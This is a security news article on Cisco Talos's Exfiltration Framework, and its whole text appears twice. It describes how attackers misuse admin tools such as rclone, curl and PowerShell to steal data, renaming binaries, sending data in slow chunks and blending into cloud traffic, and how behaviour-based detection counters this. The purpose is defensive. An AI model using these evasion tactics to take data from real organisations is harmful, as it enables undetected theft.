Why write viruses when you can use admin utilities for spying?
Common utilities familiar to every administrator are increasingly being turned into data theft tools. Attackers have stopped relying on malware and are adopting a much simpler approach: they take legitimate tools already in a company's infrastructure and stealthily export information.
Cisco Talos researchers described this approach as part of the Exfiltration Framework project. The work demonstrates how attackers exploit native operating system capabilities, popular third-party software, and cloud clients to transfer data. This approach significantly complicates detection, as traditional indicators of compromise and tool-based blocking are largely ineffective.
We're not talking about rare or exotic tools. PowerShell , robocopy, curl, rclone, Syncthing, and cloud platform clients like AWS CLI or AzCopy are all used for data theft. All of these programs are actively used in everyday work, so running them doesn't raise any suspicions.
The main problem is that attackers disguise themselves as normal activity. Data transfer occurs via standard protocols, most often HTTPS, using permitted ports and encryption. From a network perspective, such traffic appears to be backup or synchronization. Even access to cloud services doesn't raise alarms, as companies actively use them themselves.
The Exfiltration Framework focuses on behavior rather than the tools themselves. The model takes into account how a program is launched, which processes call it, where traffic flows, what traces remain in the system, and how data transfers behave. This approach helps identify persistent signs of abuse, even if a utility has been renamed or launched from a trusted directory.
The analysis revealed several characteristic techniques. One of the most common is camouflage. For example, rclone is often renamed and placed in familiar directories to conceal data transfer to the cloud. In logs, this process appears as normal system activity.
Another technique is "slow" data theft. Instead of one large upload, attackers break the data into smaller chunks and send them gradually. This method allows them to avoid triggering security systems and remain undetected for weeks.
Cloud behavior poses its own challenges. Data transfer through official clients is virtually indistinguishable from legitimate work. IP addresses and domains belong to major providers, making filtering based on network characteristics meaningless. As a result, much depends on context: who exactly is sending the data, where, and in what volume.
Traces in the system also behave differently. Some utilities leave configuration files, logs, and credentials, while others record almost nothing. For example, PowerShell scripts can run only in memory and disappear without leaving any obvious traces. Because of this, you can't rely on a consistent set of artifacts.
The authors conclude that reliable detection requires correlating data from multiple sources simultaneously. This includes endpoint logs, network traffic , and cloud service information. Moreover, it's not individual events that matter most, but deviations from normal behavior—unusual transfer volumes, unusual directions, or strange launch contexts.
Essentially, the stealth in such attacks is ensured not by sophisticated technologies, but by trusting approved tools . As long as companies consider such utilities secure by default, attackers will continue to use them as the easiest and most reliable way to exfiltrate data.
Common utilities familiar to every administrator are increasingly being turned into data theft tools. Attackers have stopped relying on malware and are adopting a much simpler approach: they take legitimate tools already in a company's infrastructure and stealthily export information.
Cisco Talos researchers described this approach as part of the Exfiltration Framework project. The work demonstrates how attackers exploit native operating system capabilities, popular third-party software, and cloud clients to transfer data. This approach significantly complicates detection, as traditional indicators of compromise and tool-based blocking are largely ineffective.
We're not talking about rare or exotic tools. PowerShell , robocopy, curl, rclone, Syncthing, and cloud platform clients like AWS CLI or AzCopy are all used for data theft. All of these programs are actively used in everyday work, so running them doesn't raise any suspicions.
The main problem is that attackers disguise themselves as normal activity. Data transfer occurs via standard protocols, most often HTTPS, using permitted ports and encryption. From a network perspective, such traffic appears to be backup or synchronization. Even access to cloud services doesn't raise alarms, as companies actively use them themselves.
The Exfiltration Framework focuses on behavior rather than the tools themselves. The model takes into account how a program is launched, which processes call it, where traffic flows, what traces remain in the system, and how data transfers behave. This approach helps identify persistent signs of abuse, even if a utility has been renamed or launched from a trusted directory.
The analysis revealed several characteristic techniques. One of the most common is camouflage. For example, rclone is often renamed and placed in familiar directories to conceal data transfer to the cloud. In logs, this process appears as normal system activity.
Another technique is "slow" data theft. Instead of one large upload, attackers break the data into smaller chunks and send them gradually. This method allows them to avoid triggering security systems and remain undetected for weeks.
Cloud behavior poses its own challenges. Data transfer through official clients is virtually indistinguishable from legitimate work. IP addresses and domains belong to major providers, making filtering based on network characteristics meaningless. As a result, much depends on context: who exactly is sending the data, where, and in what volume.
Traces in the system also behave differently. Some utilities leave configuration files, logs, and credentials, while others record almost nothing. For example, PowerShell scripts can run only in memory and disappear without leaving any obvious traces. Because of this, you can't rely on a consistent set of artifacts.
The authors conclude that reliable detection requires correlating data from multiple sources simultaneously. This includes endpoint logs, network traffic , and cloud service information. Moreover, it's not individual events that matter most, but deviations from normal behavior—unusual transfer volumes, unusual directions, or strange launch contexts.
Essentially, the stealth in such attacks is ensured not by sophisticated technologies, but by trusting approved tools . As long as companies consider such utilities secure by default, attackers will continue to use them as the easiest and most reliable way to exfiltrate data.
